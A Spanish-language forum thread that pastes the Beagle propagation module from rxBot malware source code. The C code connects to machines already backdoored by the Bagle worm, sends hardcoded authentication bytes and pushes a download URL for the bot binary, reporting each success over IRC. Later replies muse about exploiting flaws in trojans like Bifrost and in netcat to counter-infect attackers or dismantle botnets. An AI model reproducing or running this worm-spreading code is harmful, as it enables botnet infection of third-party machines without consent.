Bueno yo casi no posteo en este subforo pero he estado estudiandoe el source del rxbot y encontre este modulito :

#include "includes.h"
#include "functions.h"
#include "externs.h"
 
#ifndef NO_BEAGLE
 
char BeagleAuth1[] = "\x43\xFF\xFF\xFF\x30\x30\x30\x01\x0A\x1F\x2B\x28\x2B\xA1\x32\x01";
char BeagleAuth2[] = "\x43\xFF\xFF\xFF\x30\x30\x30\x01\x0A\x28\x91\xA1\x2B\xE6\x60\x2F\x32\x8F\x60\x15\x1A\x20\x1A";
 
BOOL Beagle(EXINFO exinfo)
{
	char *BeagleAuth, buffer[IRCLINE], botfile[MAX_PATH], fname[_MAX_FNAME], ext[_MAX_EXT];
 
	BOOL success = FALSE;
 
	WSADATA WSAData; 
	if (fWSAStartup(MAKEWORD(1,1), &WSAData)!=0) 
		return FALSE; 
 
	SOCKET sSock;
	if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
		SOCKADDR_IN ssin;
		memset(&ssin, 0, sizeof(ssin));
		ssin.sin_family = AF_INET;
		ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
		ssin.sin_port = fhtons((unsigned short)exinfo.port);
 
		if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
			BeagleAuth = ((strcmp(exinfo.command, "beagle1") == 0)?(BeagleAuth1):(BeagleAuth2));
			if(fsend(sSock, BeagleAuth, sizeof(BeagleAuth), 0) != SOCKET_ERROR) {
				if (frecv(sSock, buffer, 8, 0) != SOCKET_ERROR) {
					GetModuleFileName(0, botfile, sizeof(botfile));
					_splitpath(botfile, NULL, NULL, fname, ext);
					_snprintf(botfile, sizeof(botfile), "%s%s", fname, ext);
					_snprintf(buffer,sizeof(buffer),"http://%s:%s/%s", GetIP(sSock), httpport, botfile);
 
					if(fsend(sSock, buffer, sizeof(buffer), 0)) 
						success = TRUE;
				}
			}
		}
	}
 
	fclosesocket(sSock);
	fWSACleanup();
 
	if (success) {
		_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
		if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
		addlog(buffer);
		exploit[exinfo.exploit].stats++;
	}
 
	return (success);
}
#endif

  Bueno por lo que puedo leer el programa escanea una ip y si encuentra que esta infectada con Baggle le descarga un exploit  en principio me sorprendio por que si es asi es mas facil buscar vulnerabilidades en malware que en software legal ya que los programadores de malware casi no se preocupan por este tema en teoria se podria buscar x vulnerabilidad en un troyano y explotarla para introducir un nuevo malware ? supongo que es asi  me parece interesante el tema jeje 

Lo interesante es encontrarle alguna vunerabilidad al Bifrost para que por ejemplo si alguien te intenta infectar hacrlo al revez y infectarlo uno

   Y se puede ir mucho mas lejos se puede tirar abajo toda una Botnet obteniendo todas las trazas de todos los nodos   Teoricacamente funcionaria   

Eso suena tambien como una vulnerabilidad que tubo nc, entonces si sabias alguien se estaba conectado con netcat a x puerto entonces tu ponias tu propio exploit en listen y esperabas que un netcat se conectar para petarlo y tener el control de la maquina "Atacante"


Saludos